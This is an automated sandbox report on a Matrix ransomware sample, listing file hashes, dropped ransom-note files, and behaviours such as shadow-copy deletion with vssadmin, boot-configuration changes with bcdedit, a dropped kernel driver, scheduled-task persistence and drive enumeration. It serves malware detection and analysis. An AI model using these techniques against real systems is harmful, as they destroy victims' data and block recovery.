Analysis
-
max time kernel
150s -
max time network
138s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
03-11-2022 12:57
Static task
static1
Behavioral task
behavioral1
Sample
907636b28d162f7110b067a8178fa38c.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
907636b28d162f7110b067a8178fa38c.exe
Resource
win10v2004-20220901-en
General
-
Target
907636b28d162f7110b067a8178fa38c.exe
-
Size
1.2MB
-
MD5
907636b28d162f7110b067a8178fa38c
-
SHA1
048ae4691fe267e7c8d9eda5361663593747142a
-
SHA256
6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b
-
SHA512
501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a
-
SSDEEP
24576:R/SA+2lraRrjSJR5ezmT1dM9tZBb5t+wb8fq/81mkvfW:3XlayIsy81hvf
Malware Config
Extracted
http://myexternalip.com/raw
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\tr-tr\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ca-es\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\eu-es\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-ae\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files\Google\Chrome\Application\89.0.4389.114\WidevineCdm\_platform_specific\win_x64\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files\Microsoft Office\root\Office16\PROOF\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ko-kr\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ca-es\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\da-dk\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sk-sk\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\sv-se\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Users\All Users\Package Cache\{61087a79-ac85-455c-934d-1fa22cc64f36}\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sv-se\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fr-ma\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files\VideoLAN\VLC\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sl-si\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\es-es\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\fr-fr\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\zh-tw\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\nb-no\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fr-fr\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Users\Admin\Favorites\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-ae\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\pl-pl\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\pt-br\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\hr-hr\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nl-nl\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\css\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pl-pl\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ja-jp\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files\Java\jre1.8.0_66\lib\cmm\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files\Microsoft Office\root\Office16\1036\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ru-ru\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\tr-tr\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\FREN\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sk-sk\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sk-sk\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ru-ru\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\es-es\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\de-de\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\hu-hu\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ja-jp\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files\7-Zip\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\es-es\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\de-de\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\sv-se\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\hu-hu\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files\Google\Chrome\Application\89.0.4389.114\MEIPreload\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\hu-hu\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\uk-ua\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 3728 bcdedit.exe 4368 bcdedit.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 214 792 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS aczo234m64.exe -
Executes dropped EXE 3 IoCs
pid Process 4760 NWTW8a7C.exe 4784 aczo234m.exe 4892 aczo234m64.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" aczo234m64.exe -
resource yara_rule behavioral2/files/0x0003000000022dd0-161.dat upx behavioral2/files/0x0003000000022dd0-162.dat upx behavioral2/memory/4784-166-0x0000000000400000-0x0000000000477000-memory.dmp upx -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation wscript.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 3968 takeown.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\T: 907636b28d162f7110b067a8178fa38c.exe File opened (read-only) \??\O: 907636b28d162f7110b067a8178fa38c.exe File opened (read-only) \??\L: aczo234m64.exe File opened (read-only) \??\Z: aczo234m64.exe File opened (read-only) \??\V: 907636b28d162f7110b067a8178fa38c.exe File opened (read-only) \??\N: 907636b28d162f7110b067a8178fa38c.exe File opened (read-only) \??\K: aczo234m64.exe File opened (read-only) \??\P: aczo234m64.exe File opened (read-only) \??\Q: aczo234m64.exe File opened (read-only) \??\U: aczo234m64.exe File opened (read-only) \??\W: aczo234m64.exe File opened (read-only) \??\X: aczo234m64.exe File opened (read-only) \??\X: 907636b28d162f7110b067a8178fa38c.exe File opened (read-only) \??\Y: aczo234m64.exe File opened (read-only) \??\H: 907636b28d162f7110b067a8178fa38c.exe File opened (read-only) \??\E: 907636b28d162f7110b067a8178fa38c.exe File opened (read-only) \??\G: aczo234m64.exe File opened (read-only) \??\H: aczo234m64.exe File opened (read-only) \??\V: aczo234m64.exe File opened (read-only) \??\L: 907636b28d162f7110b067a8178fa38c.exe File opened (read-only) \??\M: 907636b28d162f7110b067a8178fa38c.exe File opened (read-only) \??\G: 907636b28d162f7110b067a8178fa38c.exe File opened (read-only) \??\F: aczo234m64.exe File opened (read-only) \??\M: aczo234m64.exe File opened (read-only) \??\Q: 907636b28d162f7110b067a8178fa38c.exe File opened (read-only) \??\U: 907636b28d162f7110b067a8178fa38c.exe File opened (read-only) \??\B: aczo234m64.exe File opened (read-only) \??\E: aczo234m64.exe File opened (read-only) \??\O: aczo234m64.exe File opened (read-only) \??\R: aczo234m64.exe File opened (read-only) \??\T: aczo234m64.exe File opened (read-only) \??\W: 907636b28d162f7110b067a8178fa38c.exe File opened (read-only) \??\Y: 907636b28d162f7110b067a8178fa38c.exe File opened (read-only) \??\S: 907636b28d162f7110b067a8178fa38c.exe File opened (read-only) \??\J: 907636b28d162f7110b067a8178fa38c.exe File opened (read-only) \??\J: aczo234m64.exe File opened (read-only) \??\Z: 907636b28d162f7110b067a8178fa38c.exe File opened (read-only) \??\I: 907636b28d162f7110b067a8178fa38c.exe File opened (read-only) \??\F: 907636b28d162f7110b067a8178fa38c.exe File opened (read-only) \??\I: aczo234m64.exe File opened (read-only) \??\S: aczo234m64.exe File opened (read-only) \??\R: 907636b28d162f7110b067a8178fa38c.exe File opened (read-only) \??\K: 907636b28d162f7110b067a8178fa38c.exe File opened (read-only) \??\A: aczo234m64.exe File opened (read-only) \??\N: aczo234m64.exe File opened (read-only) \??\P: 907636b28d162f7110b067a8178fa38c.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 212 myexternalip.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\u5msjCEb.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\AccessVL_MAK-ul-phn.xrm-ms 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-il\ui-strings.js 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\rhp_world_icon.png 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusE5R_SubTrial-ppd.xrm-ms 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\images\cursors\invalid32x32.gif 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\hu-hu\ui-strings.js 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\nl.pak.DATA 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\hr-hr\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\pt-br\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ja-jp\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-attach.jar 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MEDIA\CAMERA.WAV 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\modules\host.luac 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\nl-nl\ui-strings.js 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\tr-tr\ui-strings.js 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\main.css 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fr-fr\ui-strings.js 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sv-se\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files\7-Zip\Lang\tt.txt 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_Retail-ul-phn.xrm-ms 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalPipcR_OEM_Perp-ul-phn.xrm-ms 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_PrepidBypass-ul-oob.xrm-ms 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\sq.pak 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\da-dk\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jvmstat.jar 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusMSDNR_Retail-ppd.xrm-ms 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ca-es\ui-strings.js 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Microsoft\Edge\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files\Microsoft Office\root\rsod\proofing.msi.16.en-us.boot.tree.dat 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.components.ui_5.5.0.165303.jar 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_ja.jar 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\ext\cldrdata.jar 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\license.html 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Calibri.xml 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019R_Retail-ul-phn.xrm-ms 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\BORDERS\MSART4.BDR 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\move.svg 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\rhp\editpdf-selector.js 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-attach.jar 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TEXTCONV\WPFT632.CNV 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\en_get.svg 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_gridview.svg 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator_2.0.0.v20131217-1203.jar 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Redact_R_RHP.aapp 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected] 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OneNoteR_Trial-ul-oob.xrm-ms 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-print.jar 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdXC2RVL_KMS_ClientC2R-ppd.xrm-ms 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\FPA_f3\FA000000003 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Delete.White.png 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\adobepdf.xdc 907636b28d162f7110b067a8178fa38c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\#CORE_README#.rtf 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\IRIS\IRIS.ELM 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\open_original_form.gif 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\pt-br\ui-strings.js 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\VisualElements\Logo.png.DATA 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.core.contexts_1.3.100.v20140407-1019.jar 907636b28d162f7110b067a8178fa38c.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019VL_MAK_AE-ul-phn.xrm-ms 907636b28d162f7110b067a8178fa38c.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3736 schtasks.exe -
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 4128 vssadmin.exe 812 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 792 powershell.exe 792 powershell.exe 4892 aczo234m64.exe 4892 aczo234m64.exe 4892 aczo234m64.exe 4892 aczo234m64.exe 4892 aczo234m64.exe 4892 aczo234m64.exe 4892 aczo234m64.exe 4892 aczo234m64.exe 4892 aczo234m64.exe 4288 powershell.exe 4288 powershell.exe 4288 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 4892 aczo234m64.exe -
Suspicious use of AdjustPrivilegeToken 50 IoCs
